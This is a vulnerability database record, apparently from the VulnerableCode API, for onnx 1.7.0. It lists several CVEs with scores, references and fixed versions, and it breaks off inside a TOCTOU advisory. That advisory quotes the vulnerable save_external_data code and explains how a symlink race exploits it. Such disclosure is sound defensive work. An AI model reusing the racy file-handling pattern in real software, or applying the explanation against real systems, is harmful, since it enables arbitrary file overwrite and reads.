{"url":"http://public2.vulnerablecode.io/api/packages/31227?format=json","purl":"pkg:pypi/onnx@1.7.0","type":"pypi","namespace":"","name":"onnx","version":"1.7.0","qualifiers":{},"subpath":"","is_vulnerable":true,"next_non_vulnerable_version":"1.21.0","latest_non_vulnerable_version":"1.21.0","affected_by_vulnerabilities":[{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/36733?format=json","vulnerability_id":"VCID-2p7h-ajfk-uugy","summary":"Versions of the package onnx before and including 1.15.0 are vulnerable to Directory Traversal as the external_data field of the tensor proto can have a path to the file which is outside the model current directory or user-provided directory. The vulnerability occurs as a bypass for the patch added for CVE-2022-25882.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2024-27318","reference_id":"","reference_type":"","scores":[{"value":"0.00408","scoring_system":"epss","scoring_elements":"0.61525","published_at":"2026-06-09T12:55:00Z"},{"value":"0.00408","scoring_system":"epss","scoring_elements":"0.61505","published_at":"2026-06-08T12:55:00Z"},{"value":"0.00408","scoring_system":"epss","scoring_elements":"0.61522","published_at":"2026-06-07T12:55:00Z"},{"value":"0.00408","scoring_system":"epss","scoring_elements":"0.61533","published_at":"2026-06-06T12:55:00Z"},{"value":"0.00408","scoring_system":"epss","scoring_elements":"0.61527","published_at":"2026-06-05T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2024-27318"},{"reference_url":"https://github.com/onnx/onnx","reference_id":"","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/onnx/onnx"},{"reference_url":"https://github.com/onnx/onnx/commit/66b7fb630903fdcf3e83b6b6d56d82e904264a20","reference_id":"","reference_type":"","scores":[{"valu
e":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2024-08-14T15:31:21Z/"}],"url":"https://github.com/onnx/onnx/commit/66b7fb630903fdcf3e83b6b6d56d82e904264a20"},{"reference_url":"https://github.com/pypa/advisory-database/tree/main/vulns/onnx/PYSEC-2024-222.yaml","reference_id":"","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/pypa/advisory-database/tree/main/vulns/onnx/PYSEC-2024-222.yaml"},{"reference_url":"https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/FGTBH5ZYL2LGYHIJDHN2MAUURIR5E7PY","reference_id":"","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/FGTBH5ZYL2LGYHIJDHN2MAUURIR5E7PY"},{"reference_url":"https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/FGTBH5ZYL2LGYHIJDHN2MAUURIR5E7PY/","reference_id":"","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N"},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2024-08-14T15:31:21Z/"}],"url":"https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/FGTBH5ZYL2LGYHIJDHN2MAUURIR5E7PY/"},{"reference_url":"https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/m
essage/TFJJID2IZDOLFDMWVYTBDI75ZJQC6JOL","reference_id":"","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/TFJJID2IZDOLFDMWVYTBDI75ZJQC6JOL"},{"reference_url":"https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/TFJJID2IZDOLFDMWVYTBDI75ZJQC6JOL/","reference_id":"","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N"},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2024-08-14T15:31:21Z/"}],"url":"https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/TFJJID2IZDOLFDMWVYTBDI75ZJQC6JOL/"},{"reference_url":"https://security.snyk.io/vuln/SNYK-PYTHON-ONNX-2395479","reference_id":"","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2024-08-14T15:31:21Z/"}],"url":"https://security.snyk.io/vuln/SNYK-PYTHON-ONNX-2395479"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2024-27318","reference_id":"CVE-2024-27318","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2024-27318"},{"reference_url":"https://github.com/advisories/GHSA-whh8-fjgc-qp73","reference_id":"GHSA-whh8-fjgc-qp73","reference_type":"","scores":[{"value":"HIGH","scoring_s
ystem":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-whh8-fjgc-qp73"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/40185?format=json","purl":"pkg:pypi/onnx@1.16.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-7djm-gpg9-yfgg"},{"vulnerability":"VCID-ctup-6gs9-dkb6"},{"vulnerability":"VCID-ptv3-f9vq-vfcc"},{"vulnerability":"VCID-rs2r-qmck-4qgh"},{"vulnerability":"VCID-seht-766r-kke7"},{"vulnerability":"VCID-u796-p1fa-ubf5"},{"vulnerability":"VCID-vufm-7t73-xfgt"},{"vulnerability":"VCID-zxt4-rysw-hbf3"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:pypi/onnx@1.16.0"}],"aliases":["CVE-2024-27318","GHSA-whh8-fjgc-qp73","PYSEC-2024-222"],"risk_score":4.0,"exploitability":"0.5","weighted_severity":"8.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-2p7h-ajfk-uugy"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/37259?format=json","vulnerability_id":"VCID-7djm-gpg9-yfgg","summary":"Open Neural Network Exchange (ONNX) is an open standard for machine learning interoperability. Prior to version 1.21.0, a symlink traversal vulnerability in external data loading allows reading files outside the model directory. 
This issue has been patched in version 1.21.0.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-34447","reference_id":"","reference_type":"","scores":[{"value":"5e-05","scoring_system":"epss","scoring_elements":"0.00259","published_at":"2026-06-07T12:55:00Z"},{"value":"5e-05","scoring_system":"epss","scoring_elements":"0.0026","published_at":"2026-06-05T12:55:00Z"},{"value":"5e-05","scoring_system":"epss","scoring_elements":"0.00261","published_at":"2026-06-06T12:55:00Z"},{"value":"6e-05","scoring_system":"epss","scoring_elements":"0.00345","published_at":"2026-06-09T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-34447"},{"reference_url":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-34447","reference_id":"","reference_type":"","scores":[],"url":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-34447"},{"reference_url":"https://github.com/onnx/onnx","reference_id":"","reference_type":"","scores":[{"value":"5.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/onnx/onnx"},{"reference_url":"https://github.com/onnx/onnx/security/advisories/GHSA-p433-9wv8-28xj","reference_id":"","reference_type":"","scores":[{"value":"5.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N"},{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-01T19:14:28Z/"}],"url":"https://github.com/onnx/onnx/security/advisories/GHSA-p433-9wv8-28xj"},{"reference_url":"https://github.com/pypa/advisory-database/tree/main/vulns/onnx/PYSEC-2026-104.yaml","reference_id":"","reference_type":"","scores":[{"value":"5.5","scoring_system":"cvssv3.1","sc
oring_elements":"CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/pypa/advisory-database/tree/main/vulns/onnx/PYSEC-2026-104.yaml"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-34447","reference_id":"","reference_type":"","scores":[{"value":"5.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-34447"},{"reference_url":"https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1132608","reference_id":"1132608","reference_type":"","scores":[],"url":"https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1132608"},{"reference_url":"https://github.com/advisories/GHSA-p433-9wv8-28xj","reference_id":"GHSA-p433-9wv8-28xj","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-p433-9wv8-28xj"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/49109?format=json","purl":"pkg:pypi/onnx@1.21.0","is_vulnerable":false,"affected_by_vulnerabilities":[],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:pypi/onnx@1.21.0"}],"aliases":["CVE-2026-34447","GHSA-p433-9wv8-28xj","PYSEC-2026-104"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-7djm-gpg9-yfgg"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/63877?format=json","vulnerability_id":"VCID-ctup-6gs9-dkb6","summary":"ONNX: ONNX: Denial of Service and potential information disclosure via malicious model 
metadata","references":[{"reference_url":"https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-34445.json","reference_id":"","reference_type":"","scores":[{"value":"7.3","scoring_system":"cvssv3","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:L/I:H/A:H"}],"url":"https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-34445.json"},{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-34445","reference_id":"","reference_type":"","scores":[{"value":"0.00178","scoring_system":"epss","scoring_elements":"0.39136","published_at":"2026-06-09T12:55:00Z"},{"value":"0.00178","scoring_system":"epss","scoring_elements":"0.39124","published_at":"2026-06-08T12:55:00Z"},{"value":"0.00207","scoring_system":"epss","scoring_elements":"0.43158","published_at":"2026-06-06T12:55:00Z"},{"value":"0.00207","scoring_system":"epss","scoring_elements":"0.43136","published_at":"2026-06-07T12:55:00Z"},{"value":"0.00207","scoring_system":"epss","scoring_elements":"0.4315","published_at":"2026-06-05T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-34445"},{"reference_url":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-34445","reference_id":"","reference_type":"","scores":[],"url":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-34445"},{"reference_url":"https://github.com/onnx/onnx","reference_id":"","reference_type":"","scores":[{"value":"8.6","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/onnx/onnx"},{"reference_url":"https://github.com/onnx/onnx/commit/e30c6935d67cc3eca2fa284e37248e7c0036c46b","reference_id":"","reference_type":"","scores":[{"value":"8.6","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_eleme
nts":"SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-01T17:59:29Z/"}],"url":"https://github.com/onnx/onnx/commit/e30c6935d67cc3eca2fa284e37248e7c0036c46b"},{"reference_url":"https://github.com/onnx/onnx/pull/7751","reference_id":"","reference_type":"","scores":[{"value":"8.6","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-01T17:59:29Z/"}],"url":"https://github.com/onnx/onnx/pull/7751"},{"reference_url":"https://github.com/onnx/onnx/security/advisories/GHSA-538c-55jv-c5g9","reference_id":"","reference_type":"","scores":[{"value":"8.6","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:H"},{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-01T17:59:29Z/"}],"url":"https://github.com/onnx/onnx/security/advisories/GHSA-538c-55jv-c5g9"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-34445","reference_id":"","reference_type":"","scores":[{"value":"8.6","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-34445"},{"reference_url":"https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1132606","reference_id":"1132606","reference_type":"","scores":[],"url":"https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1132606"},{"reference_url":"https://bugzilla.redhat.com/show_bug.cgi?id=2453930","reference_id":"2453930","reference_type":"","scores":[],"url":"https://bugzilla.redhat.com/show_bug.cgi?id=2453930"},{"reference_url":"https://github.com/advisories/GHSA-
538c-55jv-c5g9","reference_id":"GHSA-538c-55jv-c5g9","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-538c-55jv-c5g9"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/49109?format=json","purl":"pkg:pypi/onnx@1.21.0","is_vulnerable":false,"affected_by_vulnerabilities":[],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:pypi/onnx@1.21.0"}],"aliases":["CVE-2026-34445","GHSA-538c-55jv-c5g9"],"risk_score":4.0,"exploitability":"0.5","weighted_severity":"8.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-ctup-6gs9-dkb6"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/36732?format=json","vulnerability_id":"VCID-mz2c-nefk-8ffx","summary":"Versions of the package onnx before and including 1.15.0 are vulnerable to Out-of-bounds Read as the ONNX_ASSERT and ONNX_ASSERTM functions have an off by one string copy.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2024-27319","reference_id":"","reference_type":"","scores":[{"value":"0.00086","scoring_system":"epss","scoring_elements":"0.24885","published_at":"2026-06-05T12:55:00Z"},{"value":"0.00086","scoring_system":"epss","scoring_elements":"0.24766","published_at":"2026-06-09T12:55:00Z"},{"value":"0.00086","scoring_system":"epss","scoring_elements":"0.24759","published_at":"2026-06-08T12:55:00Z"},{"value":"0.00086","scoring_system":"epss","scoring_elements":"0.24816","published_at":"2026-06-07T12:55:00Z"},{"value":"0.00086","scoring_system":"epss","scoring_elements":"0.24875","published_at":"2026-06-06T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2024-27319"},{"reference_url":"https://github.com/onnx/onnx","reference_id":"","reference_type":"","scores":[{"value":"4.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:L"},{"value":"MODERATE","scoring_system":"generic_textual","sco
ring_elements":""}],"url":"https://github.com/onnx/onnx"},{"reference_url":"https://github.com/onnx/onnx/commit/08a399ba75a805b7813ab8936b91d0e274b08287","reference_id":"","reference_type":"","scores":[{"value":"4.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:L"},{"value":"9.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-02-23T22:35:11Z/"}],"url":"https://github.com/onnx/onnx/commit/08a399ba75a805b7813ab8936b91d0e274b08287"},{"reference_url":"https://github.com/pypa/advisory-database/tree/main/vulns/onnx/PYSEC-2024-223.yaml","reference_id":"","reference_type":"","scores":[{"value":"4.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:L"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/pypa/advisory-database/tree/main/vulns/onnx/PYSEC-2024-223.yaml"},{"reference_url":"https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/FGTBH5ZYL2LGYHIJDHN2MAUURIR5E7PY","reference_id":"","reference_type":"","scores":[{"value":"4.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:L"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/FGTBH5ZYL2LGYHIJDHN2MAUURIR5E7PY"},{"reference_url":"https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/FGTBH5ZYL2LGYHIJDHN2MAUURIR5E7PY/","reference_id":"","reference_type":"","scores":[{"value":"4.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:L"},{"value":"9.1","scoring_system":"cv
ssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H"},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-02-23T22:35:11Z/"}],"url":"https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/FGTBH5ZYL2LGYHIJDHN2MAUURIR5E7PY/"},{"reference_url":"https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/TFJJID2IZDOLFDMWVYTBDI75ZJQC6JOL","reference_id":"","reference_type":"","scores":[{"value":"4.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:L"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/TFJJID2IZDOLFDMWVYTBDI75ZJQC6JOL"},{"reference_url":"https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/TFJJID2IZDOLFDMWVYTBDI75ZJQC6JOL/","reference_id":"","reference_type":"","scores":[{"value":"4.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:L"},{"value":"9.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H"},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-02-23T22:35:11Z/"}],"url":"https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/TFJJID2IZDOLFDMWVYTBDI75ZJQC6JOL/"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2024-27319","reference_id":"CVE-2024-27319","reference_type":"","scores":[{"value":"4.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:L"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2024-27319"},{"reference_url":"https://github.com/advisories/GHSA-h8wv-9h96-m4hr","reference_id":"GHSA-h8wv-
9h96-m4hr","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-h8wv-9h96-m4hr"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/40185?format=json","purl":"pkg:pypi/onnx@1.16.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-7djm-gpg9-yfgg"},{"vulnerability":"VCID-ctup-6gs9-dkb6"},{"vulnerability":"VCID-ptv3-f9vq-vfcc"},{"vulnerability":"VCID-rs2r-qmck-4qgh"},{"vulnerability":"VCID-seht-766r-kke7"},{"vulnerability":"VCID-u796-p1fa-ubf5"},{"vulnerability":"VCID-vufm-7t73-xfgt"},{"vulnerability":"VCID-zxt4-rysw-hbf3"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:pypi/onnx@1.16.0"}],"aliases":["CVE-2024-27319","GHSA-h8wv-9h96-m4hr","PYSEC-2024-223"],"risk_score":4.1,"exploitability":"0.5","weighted_severity":"8.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-mz2c-nefk-8ffx"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/63875?format=json","vulnerability_id":"VCID-ptv3-f9vq-vfcc","summary":"onnx: ONNX: Information disclosure through hardlink path 
traversal","references":[{"reference_url":"https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-34446.json","reference_id":"","reference_type":"","scores":[{"value":"4.7","scoring_system":"cvssv3","scoring_elements":"CVSS:3.1/AV:L/AC:H/PR:N/UI:R/S:U/C:H/I:N/A:N"}],"url":"https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-34446.json"},{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-34446","reference_id":"","reference_type":"","scores":[{"value":"4e-05","scoring_system":"epss","scoring_elements":"0.00198","published_at":"2026-06-09T12:55:00Z"},{"value":"4e-05","scoring_system":"epss","scoring_elements":"0.00164","published_at":"2026-06-06T12:55:00Z"},{"value":"4e-05","scoring_system":"epss","scoring_elements":"0.00163","published_at":"2026-06-07T12:55:00Z"},{"value":"4e-05","scoring_system":"epss","scoring_elements":"0.00199","published_at":"2026-06-08T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-34446"},{"reference_url":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-34446","reference_id":"","reference_type":"","scores":[],"url":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-34446"},{"reference_url":"https://github.com/onnx/onnx","reference_id":"","reference_type":"","scores":[{"value":"4.7","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:H/PR:N/UI:R/S:U/C:H/I:N/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/onnx/onnx"},{"reference_url":"https://github.com/onnx/onnx/commit/4755f8053928dce18a61db8fec71b69c74f786cb","reference_id":"","reference_type":"","scores":[{"value":"4.7","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:H/PR:N/UI:R/S:U/C:H/I:N/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-02T14:10:29Z/"}],"url":"https://github.com/onnx/onnx/commit/
4755f8053928dce18a61db8fec71b69c74f786cb"},{"reference_url":"https://github.com/onnx/onnx/security/advisories/GHSA-cmw6-hcpp-c6jp","reference_id":"","reference_type":"","scores":[{"value":"4.7","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:H/PR:N/UI:R/S:U/C:H/I:N/A:N"},{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-02T14:10:29Z/"}],"url":"https://github.com/onnx/onnx/security/advisories/GHSA-cmw6-hcpp-c6jp"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-34446","reference_id":"","reference_type":"","scores":[{"value":"4.7","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:H/PR:N/UI:R/S:U/C:H/I:N/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-34446"},{"reference_url":"https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1132607","reference_id":"1132607","reference_type":"","scores":[],"url":"https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1132607"},{"reference_url":"https://bugzilla.redhat.com/show_bug.cgi?id=2454371","reference_id":"2454371","reference_type":"","scores":[],"url":"https://bugzilla.redhat.com/show_bug.cgi?id=2454371"},{"reference_url":"https://github.com/advisories/GHSA-cmw6-hcpp-c6jp","reference_id":"GHSA-cmw6-hcpp-c6jp","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-cmw6-hcpp-c6jp"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/49109?format=json","purl":"pkg:pypi/onnx@1.21.0","is_vulnerable":false,"affected_by_vulnerabilities":[],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:pypi/onnx@1.21.0"}],"aliases":["CVE-2026-34446","GHSA-cmw6-hcpp-c6jp"],"risk_score":3.1,"exploitabil
ity":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-ptv3-f9vq-vfcc"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/90052?format=json","vulnerability_id":"VCID-rs2r-qmck-4qgh","summary":"ONNX: TOCTOU arbitrary file read/write in save_external_data\n### Summary\n\nThe `save_external_data` method seems to include multiple issues introducing a local TOCTOU vulnerability, an arbitrary file read/write on any system. It potentially includes a path validation bypass on Windows systems.\nRegarding the TOCTOU, an attacker seems to be able to overwrite victim's files via symlink following under the same privilege scope.\nThe mentioned function can be found here: https://github.com/onnx/onnx/blob/main/onnx/external_data_helper.py#L188\n\n### Details\n\n#### TOCTOU\nThe vulnerable code pattern:\n```python\n   # CHECK - Is this a file?\n   if not os.path.isfile(external_data_file_path):\n       # Line 228-229: USE #1 - Create if it doesn't exist\n       with open(external_data_file_path, \"ab\"):\n           pass\n   \n   # Open for writing\n   with open(external_data_file_path, \"r+b\") as data_file:\n       # Lines 233-243: Write tensor data\n       data_file.seek(0, 2)\n       if info.offset is not None:\n           file_size = data_file.tell()\n           if info.offset > file_size:\n               data_file.write(b\"\\0\" * (info.offset - file_size))\n           data_file.seek(info.offset)\n       offset = data_file.tell()\n       data_file.write(tensor.raw_data)\n```\nThere is a time gap between `os.path.isfile` and `open` with no atomic file creation flags (e.g. `O_EXCL | O_CREAT`) allowing the attacker to create a symlink that is being followed (absence of `O_NOFOLLOW`), between these two calls. 
